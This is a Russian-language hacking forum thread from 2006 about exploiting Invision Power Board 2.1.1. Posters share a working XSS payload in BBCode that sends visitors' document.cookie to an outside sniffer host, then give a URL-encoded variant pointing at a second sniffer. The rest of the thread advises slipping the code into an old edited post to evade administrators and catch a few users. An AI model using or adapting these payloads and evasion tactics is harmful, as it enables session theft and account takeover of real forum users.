Вопрос по эксплойту для Ipb 2.1.1.

Discussion in 'Песочница' started by Zheca, 26 Dec 2005.

  1. maXaTTAck

    maXaTTAck New Member

    Joined:
    6 Sep 2005
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Помог такой код:

    HTML:
    [EMAIL][email protected][URL=wj/style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/URL][/EMAIL]
    Вопрос: А как закодировать в такие вот коды сниффер http://s.netsec.ru/sec/pic.gif

    Имеется в виду символы адреса в код
     
    #21 maXaTTAck, 2 Jan 2006
    Last edited: 2 Jan 2006
  2. sssssssssssq

    sssssssssssq Banned

    Joined:
    8 Aug 2005
    Messages:
    669
    Likes Received:
    426
    Reputations:
    335
    Code:
    %5BEMAIL%[email protected]%5BURL%3Dwj/style%3Dbackground%3Aurl%28javascript%3Adocument.images%5B1%5D.src%3D%22http%3A//s.netsec.ru/sec/pic.gif%3F%22document.cookie%29%3B%20%5D%5B/URL%5D%5B/EMAIL%5D

    На вот так вроде!
     
    #22 sssssssssssq, 2 Jan 2006
    Last edited: 2 Jan 2006
  3. Tem

    Tem -

    Joined:
    5 Oct 2005
    Messages:
    557
    Likes Received:
    157
    Reputations:
    179
    Можеш тут _http://webmastertools.narod.ru/OnlineTools/url_decode.html , поменяй сылку на снифер _http://antichat.ru/cgi-bin/s.jpg на http://s.netsec.ru/sec/pic.gif , и кодируй.
     
  4. Zheca

    Zheca Elder - Старейшина

    Joined:
    18 Dec 2005
    Messages:
    79
    Likes Received:
    4
    Reputations:
    0
    А если код вставить в свое же собщение, но в то которое я писал допустим ранее - ну отредактировать свое старое сообщение, он будет работать? То есть после него уже могло куча народу запостится - а так отредактирую старое сообщение и админу глаза не мозолит и мне приятно
     
  5. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    Ты получаешь куки только с той страницы на которой отображается твоё сообщение. Сомневаюсь что многие будут листать топик назад и читать, допустим вторую его страницу, а не последнии сообщения, допустим на десятой.
     
  6. Zheca

    Zheca Elder - Старейшина

    Joined:
    18 Dec 2005
    Messages:
    79
    Likes Received:
    4
    Reputations:
    0
    Это понятно - это будет работать? - или нужно обязательно создавать новый пост?
     
  7. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    Будет, при условии что оно отобразится на страничке у жертвы.
     
  8. Zheca

    Zheca Elder - Старейшина

    Joined:
    18 Dec 2005
    Messages:
    79
    Likes Received:
    4
    Reputations:
    0
    Эт я к вопросам по поводу того, что текст кода виден из других браузеров - и админ удаляет посты. Ведб это выход - запостится, подождать пока накопятся сообщения, и пока не совершился переход на следующую страницу - изменить свой первый пост вставив туда код. Пару, тройку юзеров можно поймать вот таким образом
     
  9. Humor

    Humor Banned

    Joined:
    26 Jan 2006
    Messages:
    14
    Likes Received:
    2
    Reputations:
    0
    Нет это не правильно, прочти http://forum.antichat.ru/showthread.php?t=11807 Я дал пример как это можно реальзивать. ` тут СОВСЕМ не причем!
     
Loading...
Similar Threads - Вопрос эксплойту
  1. gilo20
    Replies:
    2
    Views:
    2,420
  2. Dobi768
    Replies:
    2
    Views:
    2,341
  3. avva99on
    Replies:
    0
    Views:
    2,344